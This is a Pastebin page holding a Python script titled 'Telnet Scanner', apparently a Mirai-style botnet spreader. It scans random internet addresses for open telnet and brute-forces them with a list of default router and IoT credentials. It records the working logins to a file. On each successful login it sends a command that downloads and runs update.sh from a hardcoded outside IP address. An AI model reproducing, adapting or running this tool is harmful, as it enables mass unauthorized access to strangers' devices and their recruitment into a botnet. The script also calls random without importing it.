Advertisement
KekSec

Telnet Scanner

Jan 11th, 2018
4,059
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.30 KB | None | 0 0
  1. #!/usr/bin/python
  2. # Simple Telnet Bruter | By; ScanRouters
  3. # Lots of false possitives but pulls alot of results extremely fast
  4.  
  5. import threading
  6. import sys, os, re, time, socket
  7. from sys import stdout
  8.  
  9. if len(sys.argv) < 3:
  10. print "Usage: python "+sys.argv[0]+" <threads> <output file>"
  11. sys.exit()
  12.  
  13. combo = [
  14. "support:support",
  15. "root:vizxv",
  16. "root:xc3511",
  17. "telnet:telnet",
  18. "root:root",
  19. "supervisor:zyad1234",
  20. "root:",
  21. "admin:1234",
  22. "user:user",
  23. "root:antslq",
  24. "admin:admin",
  25. "root:5up"
  26. ]
  27.  
  28. threads = int(sys.argv[1])
  29. output_file = sys.argv[2]
  30.  
  31. class router(threading.Thread):
  32. def __init__ (self, ip):
  33. threading.Thread.__init__(self)
  34. self.ip = str(ip).rstrip('\n')
  35. def run(self):
  36. username = ""
  37. password = ""
  38. for passwd in combo:
  39. if ":n/a" in passwd:
  40. password=""
  41. else:
  42. password=passwd.split(":")[1]
  43. if "n/a:" in passwd:
  44. username=""
  45. else:
  46. username=passwd.split(":")[0]
  47. try:
  48. tn = socket.socket()
  49. tn.settimeout(8)
  50. tn.connect((self.ip,23))
  51. except Exception:
  52. tn.close()
  53. break
  54. try:
  55. hoho = ''
  56. hoho += readUntil(tn, "ogin:")
  57. if "ogin" in hoho:
  58. tn.send(username + "\n")
  59. time.sleep(0.09)
  60. except Exception:
  61. tn.close()
  62. try:
  63. hoho = ''
  64. hoho += readUntil(tn, "assword:")
  65. if "assword" in hoho:
  66. tn.send(password + "\n")
  67. time.sleep(0.8)
  68. else:
  69. pass
  70. except Exception:
  71. tn.close()
  72. try:
  73. prompt = ''
  74. prompt += tn.recv(40960)
  75. if ">" in prompt and "ONT" not in prompt:
  76. success = True
  77. elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
  78. success = True
  79. else:
  80. tn.close()
  81. if success == True:
  82. try:
  83. os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai
  84. tn.send("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.33.58.102/update.sh; busybox wget http://45.33.58.102/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh\n")
  85. print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
  86. tn.close()
  87. break
  88. except:
  89. tn.close()
  90. else:
  91. tn.close()
  92. except Exception:
  93. tn.close()
  94.  
  95. def readUntil(tn, string, timeout=8):
  96. buf = ''
  97. start_time = time.time()
  98. while time.time() - start_time < timeout:
  99. buf += tn.recv(1024)
  100. time.sleep(0.01)
  101. if string in buf: return buf
  102. raise Exception('TIMEOUT!')
  103.  
  104. def Gen_IP():
  105. not_valid = [10,127,169,172,192]
  106. first = random.randrange(1,256)
  107. while first in not_valid:
  108. first = random.randrange(1,256)
  109. ip = ".".join([str(first),str(random.randrange(1,256)),
  110. str(random.randrange(1,256)),str(random.randrange(1,256))])
  111. return ip
  112.  
  113. def HaxThread():
  114. while 1:
  115. try:
  116. s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  117. s.settimeout(370)
  118. IP = Gen_IP()
  119. s.connect((IP, 23))
  120. s.close()
  121. print "\033[32m[\033[31m+\033[32m] FOUND " + IP
  122. thread = router(IP)
  123. thread.start()
  124. except:
  125. pass
  126.  
  127. if __name__ == "__main__":
  128. threadcount = 0
  129. for i in xrange(0,threads):
  130. try:
  131. threading.Thread(target=HaxThread, args=()).start()
  132. threadcount += 1
  133. except:
  134. pass
  135. print "[*] Started " + str(threadcount) + " scanner threads!"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement